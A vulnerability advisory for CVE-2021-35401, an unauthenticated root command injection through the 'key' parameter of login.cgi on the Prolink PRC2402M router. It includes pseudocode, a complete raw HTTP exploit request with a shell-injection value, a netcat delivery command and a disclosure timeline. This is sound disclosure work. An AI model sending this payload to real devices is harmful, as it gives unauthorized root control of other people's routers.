CVE: CVE-2021-35401

Tested Versions:

  • Prolink PRC2402M 20190909

Product URL(s):

Description of the vulnerability

This vulnerability is present as there are no checks on user input taken by login.cgi, which is passed to popen, allowing an attacker to execute arbitrary code in the context of the root user on affected installations of the Prolink PRC2402M router.

No authentication is required to exploit this vulnerability.

The router makes POST requests through HTML forms to interact with the cgi scripts. To access the vulnerable script, visit http://localhost/cgi-bin/login.cgi.

In qos.cgi, the main function checks if the page parameter is equal to login. If so, it calls the vulnerable function sys_login.

    page = web_get("page", body);
    if (strcmp(page,"test") == 0) {
        set_lang_CountryCode(body);
    }
    else if (strcmp(page,"login") == 0) {
        sys_login(body);
    }
    ...

As seen in the simplified pseudocode of sys_login below, the key parameter is passed to popen without any input validation, allowing an attacker to supply malicious input and gain arbitrary code execution. The langChange parameter needs to be not equal to "1" to trigger the vulnerable code path.

void sys_login(undefined4 request)
{
    ...
    Password = nvram_bufget(0,"Password");
    ...
    key = web_get("key",body);
    key = strdup(key);
    ...
    langChange = web_get("langChange",body);
    langChange = strdup(langChange);

    ...
    if (strcmp(langChange, "1") == 0) {
        ...
    }
    else {
        strcpy((char *)&salted, key);
        strcat((char *)&salted, Password);
        sprintf(command,"echo -n \'%s\' | md5sum", &salted);
        popen(command, "r");
    }
    ...
}

Exploit

The following payload contains the raw HTTP request that can be used to exploit this vulnerability.

POST /cgi-bin/login.cgi HTTP/1.0
Host: localhost
User-Agent: HTTPie/2.4.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 208

page=login&newUI=0&username=admin&password=password&hostname=localhost&ipaddr=127.0.0.1&homepage=index&sysinitpage=index&wizardpage=index&login_page=index&lang_select=0&langChange=0&key=' $(echo gg>/tmp/gg) #

Save it in a file and run cat payload | nc 192.168.0.1 80.

Note! Make sure CRLF endings is used in the request payload, otherwise lighttpd which runs on the server will ignore this request.

Timeline

  • 2021-06-10 Reported to Vendor, Prolink
  • 2021-06-10 Prolink acknowledged report
  • 2021-06-10 Prolink claimed to have patched it
  • 2021-06-11 Team member Daniel Lim sent in his bypass for their patch
  • 2021-06-11 Prolink acknowledged the new bypass
  • 2021-06-13 Prolink fixed it